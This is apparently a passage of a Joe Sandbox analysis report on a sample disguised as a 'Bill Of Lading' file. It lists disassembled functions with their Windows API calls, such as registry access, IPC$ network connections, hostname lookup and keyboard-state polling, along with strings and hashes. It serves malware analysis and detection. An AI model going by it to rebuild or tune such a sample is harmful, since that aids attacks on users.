• Opcode Fuzzy Hash: b9e44105478404289108567262d296c88e7101013f7783f6c7bd148379995db0
• Instruction Fuzzy Hash: 86516E71604300ABD710EF55CC85F5EB3E4AF88714F14496EF985AB2D2D7B8E908CB5A
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _wcslen$_wcsncpy$LocalTime__wcstoi64
• String ID:
• API String ID: 228034949-0
• Opcode ID: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
• Instruction ID: c9113392db11e6d0b84b7dcaf0f9983ae7bcdcfbf3325debe08446cd55f13bc3
• Opcode Fuzzy Hash: d55b35800c2a6f74fd0df3de6656c0821778ac1c15f087543c4dc83ec7dd6154
• Instruction Fuzzy Hash: 874194B181435066DA10FF6AC8479DFB3A8EF89314F84495FF945D3162E378E64883AA
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,?,0046FAD5), ref: 004334F4
• GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043350F
• GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043351A
• GlobalLock.KERNEL32(00000000), ref: 00433523
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433533
• GlobalUnlock.KERNEL32(00000000), ref: 0043353A
• CloseHandle.KERNEL32(00000000,?,?,?,?,0046FAD5,?,?,?,?), ref: 00433541
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0046FAD5,?,?,?,?), ref: 0043354F
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00482A20,?), ref: 00433568
• GlobalFree.KERNEL32(00000000), ref: 0043357B
• GetObjectW.GDI32(?,00000018,?), ref: 004335A6
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 004335DB
• DeleteObject.GDI32(?), ref: 00433603
• SendMessageW.USER32(?,00000172,00000000,?), ref: 0043361B
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Global$File$CreateObject$AllocCloseCopyDeleteFreeHandleImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3969911579-0
• Opcode ID: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
• Instruction ID: 5aed18668fdc988692497ed4484016cc97142e8c7c748bcd34b77a3330007e11
• Opcode Fuzzy Hash: c8af0a6d34b3156cf5dea3d494721158f709963105dd3e2632bd1b1f7de041f4
• Instruction Fuzzy Hash: 70410471204210AFD710DF64DC88F6BBBE8FB89711F10492DFA45972A0D7B5A941CBAA
APIs
  • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
• mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0045EF6C
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EF81
• mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045EF94
• mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0045EFAB
• mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0045EFB8
• mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0045EFD2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: SendString$_wcslen
• String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
• API String ID: 2420728520-1007645807
• Opcode ID: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
• Instruction ID: e5e6e3524f15ee9b53aa238c1547bf14c0af5fa70a1fb0ad50a0449216793e57
• Opcode Fuzzy Hash: 2e8e49e05c1f121906b47c7a82fbb4c843ecfb9788746b18ac8014d8855edcbb
• Instruction Fuzzy Hash: F321A53164830476E220FB51DC87F9E7798AB84B14F200D3BBA407A0D1DBA8E94CC76E
APIs
• GetParent.USER32 ref: 00445A8D
• GetClassNameW.USER32(00000000,?,00000100), ref: 00445AA0
• __wcsicoll.LIBCMT ref: 00445AC4
• __wcsicoll.LIBCMT ref: 00445AE0
• SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00445B3D
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: __wcsicoll$ClassMessageNameParentSend
• String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
• API String ID: 3125838495-3381328864
• Opcode ID: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
• Instruction ID: 9ea7b4bfd8e333fc3d4c3d1cc69785ca983c3453aa66f955cff8de8c622a02b1
• Opcode Fuzzy Hash: 6f6f70247b4827d2a410ddc22f410c306ecb8b2e46d0c95c17204de523c723c4
• Instruction Fuzzy Hash: F011E9B1B40301BBFF10B6659C46EAF739CDF94759F00081BFD44E6182F6ACA9458769
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CopyVariant$ErrorLast
                                                                                                                      • String ID: Conversion of parameters failed$NULL Pointer assignment$Not an Object type
                                                                                                                      • API String ID: 2286883814-4206948668
                                                                                                                      • Opcode ID: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                      • Instruction ID: 5c76bcf0434180a49ef26f8382d3619d889c8a8ee3f63882ad125ac36acecb62
                                                                                                                      • Opcode Fuzzy Hash: 2f6e4bc4aaf8f7a3794965dba448b56a5b6575b3b05f264a778baa01eb75d6f6
                                                                                                                      • Instruction Fuzzy Hash: 4EA1F0B1644300ABD620EB25CC81EABB3E9FBC4704F10891EF65987251D779E945CBAA
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0045335B: CharLowerBuffW.USER32(?,?,?,0045D9DB,?,?,?), ref: 0045336E
                                                                                                                        • Part of subcall function 00445975: _wcslen.LIBCMT ref: 00445984
                                                                                                                      • GetDriveTypeW.KERNEL32(?,?,00000061), ref: 00475EEC
                                                                                                                      • _wcscpy.LIBCMT ref: 00475F18
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                      • String ID: a$all$cdrom$fixed$network$ramdisk$removable$unknown$HH
                                                                                                                      • API String ID: 3052893215-4176887700
                                                                                                                      • Opcode ID: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                      • Instruction ID: 30c0e749cffa51fc832ec364bb88d57898ea161693411a08ebb212f54f1b1ce2
                                                                                                                      • Opcode Fuzzy Hash: 531685fb0cf90d6ae2ec3f9560420c3d557b818d2d0e5f32259ad5e7ccb69ffd
                                                                                                                      • Instruction Fuzzy Hash: E951E5716047009BC710EF51D981B9BB3D4AB85705F108C2FF948AB382D7B9DE09879B
                                                                                                                      APIs
                                                                                                                      • StringFromIID.OLE32(?,?,00000003,?,?,00000000), ref: 004582E5
                                                                                                                        • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                                                        • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • CoTaskMemFree.OLE32(?,00000000), ref: 00458335
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,?), ref: 00458351
                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 00458381
                                                                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 004583AF
                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 004583E8
                                                                                                                      • LoadRegTypeLib.OLEAUT32(?,?), ref: 00458486
                                                                                                                        • Part of subcall function 00413F97: __wtof_l.LIBCMT ref: 00413FA1
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004584BA
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FromQueryStringValue_wcslen$CloseFreeLoadOpenTaskType__wtof_l_wcscpy
                                                                                                                      • String ID: Version$\TypeLib$interface\
                                                                                                                      • API String ID: 656856066-939221531
                                                                                                                      • Opcode ID: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                      • Instruction ID: 73379605cfaaf105ee685c6daddaf2c4824f5dc828714578f474d0d05c7db838
                                                                                                                      • Opcode Fuzzy Hash: fae0be2ce993580ee9701cb6b1f6a998fde8705fa16d3e1feab2af977247b743
                                                                                                                      • Instruction Fuzzy Hash: 19513B715083059BD310EF55D944A6FB3E8FFC8B08F004A2DF985A7251EA78DD09CB9A
                                                                                                                      APIs
                                                                                                                      • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E676
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E69A
                                                                                                                      • __swprintf.LIBCMT ref: 0045E6EE
                                                                                                                      • _printf.LIBCMT ref: 0045E7A9
                                                                                                                      • _printf.LIBCMT ref: 0045E7D2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadString_printf$__swprintf_wcslen
                                                                                                                      • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                      • API String ID: 3590180749-2354261254
                                                                                                                      • Opcode ID: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                      • Instruction ID: 835382aeb01427732dc6b750cf2ba574ed77461063debdd42288bdc21f9728b4
                                                                                                                      • Opcode Fuzzy Hash: fd3ade05fede2dfa3d14bccfacac15f81e3d16141c85e45952f832d3a26197ce
                                                                                                                      • Instruction Fuzzy Hash: B051D5715143019BD324FB51CC41EAF77A8AF84354F14093FF94563292DB78AE49CB6A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                      • String ID: %.15g$0x%p$False$True
                                                                                                                      • API String ID: 3038501623-2263619337
                                                                                                                      • Opcode ID: 19a4eb4a0385f4e3e29933f3f54d071d1af3cac5b39b122aee5b24a105b2230c
                                                                                                                      • Instruction ID: 2d826072eebb3cc9b8b6a8fde8b9da0ebc7f558755c715a4a51c402ed3db85ba
                                                                                                                      • Opcode Fuzzy Hash: 19a4eb4a0385f4e3e29933f3f54d071d1af3cac5b39b122aee5b24a105b2230c
                                                                                                                      • Instruction Fuzzy Hash: 5741E5B2504204ABD700EF35EC06EAB73A4EB95304F04892FFD0997282F67DD619976E
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • _memset.LIBCMT ref: 00458194
                                                                                                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 004581D6
                                                                                                                      • RegConnectRegistryW.ADVAPI32(?,80000002,00000000), ref: 004581F4
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,00000000), ref: 00458219
                                                                                                                      • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,?), ref: 00458248
                                                                                                                      • CLSIDFromString.OLE32(00000000,?), ref: 00458279
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0045828F
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 00458296
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memset_wcslen
                                                                                                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                      • API String ID: 2255324689-22481851
                                                                                                                      • Opcode ID: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                      • Instruction ID: 0916ae95de1959dc40878de41837780f7e862baf069d4d5c3429810960799c2e
                                                                                                                      • Opcode Fuzzy Hash: 40f125b4ffe5f12493adc0cb93ab67eb911e8c28f62e3d79c4190a4fe5521cad
                                                                                                                      • Instruction Fuzzy Hash: 4A4190725083019BD320EF54C845B5FB7E8AF84714F044D2EFA8577291DBB8E949CB9A
                                                                                                                      APIs
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,interface,00000000,00020019,?), ref: 00458513
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00458538
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00458615
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000000,?,00000000,00020019,000001FE,interface\), ref: 0045858A
                                                                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,00000028), ref: 004585A8
                                                                                                                      • __wcsicoll.LIBCMT ref: 004585D6
                                                                                                                      • IIDFromString.OLE32(?,?,?,?), ref: 004585EB
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 004585F8
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                       • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                       • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseOpen$EnumFromQueryStringValue__wcsicoll_wcslen
                                                                                                                      • String ID: ($interface$interface\
                                                                                                                      • API String ID: 2231185022-3327702407
                                                                                                                      • Opcode ID: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                      • Instruction ID: 2ed788c9a442d2de66cb2a0eaf665167c450c6ff9570aaff4df7cfaf3afbbce1
                                                                                                                      • Opcode Fuzzy Hash: f3ba987632fb2ab980929a1e8c26c1d4f1068388d2a95cb25d4e52b6d927b3fe
                                                                                                                      • Instruction Fuzzy Hash: CE317271204305ABE710DF54DD85F6BB3E8FB84744F10492DF685A6191EAB8E908C76A
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 004365A5
• gethostname.WSOCK32(00000100,00000100,00000101,?), ref: 004365BC
• gethostbyname.WSOCK32(00000101,00000100,00000100,00000101,?), ref: 004365C6
• _wcscpy.LIBCMT ref: 004365F5
• WSACleanup.WSOCK32 ref: 004365FD
• inet_ntoa.WSOCK32(00000100,?), ref: 00436624
• _strcat.LIBCMT ref: 0043662F
• _wcscpy.LIBCMT ref: 00436644
• WSACleanup.WSOCK32(?,?,?,?,?,?,00000100,?), ref: 00436652
• _wcscpy.LIBCMT ref: 00436666
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _wcscpy$Cleanup$Startup_strcatgethostbynamegethostnameinet_ntoa
• String ID: 0.0.0.0
• API String ID: 2691793716-3771769585
• Opcode ID: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
• Instruction ID: 29d249c793a1599df1911ffab6ed89036a29d54f41df1114d8fa63e2d2305339
• Opcode Fuzzy Hash: edbc70afde67a55f4b99ee40814c5331da24f6846b253968828d225e396465d4
• Instruction Fuzzy Hash: 5C21D4726003016BD620FB269C42FFF33A89FD4318F54492FF64456242EABDD58983AB
APIs
• GetModuleHandleW.KERNEL32(KERNEL32.DLL,0048C968,0000000C,00416C4D,00000000,00000000,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416B24
• __crt_waiting_on_module_handle.LIBCMT ref: 00416B2F
  • Part of subcall function 0041177F: Sleep.KERNEL32(000003E8,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 0041178B
  • Part of subcall function 0041177F: GetModuleHandleW.KERNEL32(00411739,?,?,00416A38,KERNEL32.DLL,?,00411B0C,?,00413973,00411739,?,?,00411739,?,00401C0B), ref: 00411794
• GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00416B58
• GetProcAddress.KERNEL32(00411739,DecodePointer), ref: 00416B68
• __lock.LIBCMT ref: 00416B8A
• InterlockedIncrement.KERNEL32(00EA60FF), ref: 00416B97
• __lock.LIBCMT ref: 00416BAB
• ___addlocaleref.LIBCMT ref: 00416BC9
Strings
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
• String ID: DecodePointer$EncodePointer$KERNEL32.DLL
• API String ID: 1028249917-2843748187
• Opcode ID: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
• Instruction ID: dfb830706c011728ae11a8c0f52cb2fa371409e71f4acd403326aacb15a29bdd
• Opcode Fuzzy Hash: 149215eb9963fdce733e6eee9b7d54027110d9b9ecd285c2a82fe369659baa59
• Instruction Fuzzy Hash: 4E119671944701AFD720EF76C905B9EBBE0AF00714F10495FE469A6391DB78A580CB1D
APIs
• SendMessageW.USER32(?,00000000,000000FF,?), ref: 0044931D
• SendMessageW.USER32(?,0045BBB0,00000000,00000000), ref: 0044932D
• CharNextW.USER32(?,?,?,?,0045BBB0,00000000,00000000,?,?), ref: 00449361
• SendMessageW.USER32(?,?,00000000,00000000), ref: 00449375
• SendMessageW.USER32(?,00000402,?), ref: 0044941C
• SendMessageW.USER32(004A83D8,000000C2,00000001,?), ref: 004494A0
• SendMessageW.USER32(?,00001002,00000000,?), ref: 00449515
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: MessageSend$CharNext
• String ID:
• API String ID: 1350042424-0
• Opcode ID: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
• Instruction ID: cf19a455924c4199ae2d31ef2e344bdd2865620a2145bd440d1f5c61272ee54d
• Opcode Fuzzy Hash: 5fd89deb92f75c0e0d7406111af65340a6b95ffecf1ba9c2db83920ef449de6e
• Instruction Fuzzy Hash: 5D81B5312083019BE720DF15DC85FBBB7E4EBD9B20F00492EFA54962C0D7B99946D766
APIs
• GetKeyboardState.USER32(?,?,00000000), ref: 00453C0D
• SetKeyboardState.USER32(?), ref: 00453C5A
• GetAsyncKeyState.USER32(000000A0), ref: 00453C82
• GetKeyState.USER32(000000A0), ref: 00453C99
• GetAsyncKeyState.USER32(000000A1), ref: 00453CC9
• GetKeyState.USER32(000000A1), ref: 00453CDA
• GetAsyncKeyState.USER32(00000011), ref: 00453D07
• GetKeyState.USER32(00000011), ref: 00453D15
• GetAsyncKeyState.USER32(00000012), ref: 00453D3F
• GetKeyState.USER32(00000012), ref: 00453D4D
• GetAsyncKeyState.USER32(0000005B), ref: 00453D77
• GetKeyState.USER32(0000005B), ref: 00453D85
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
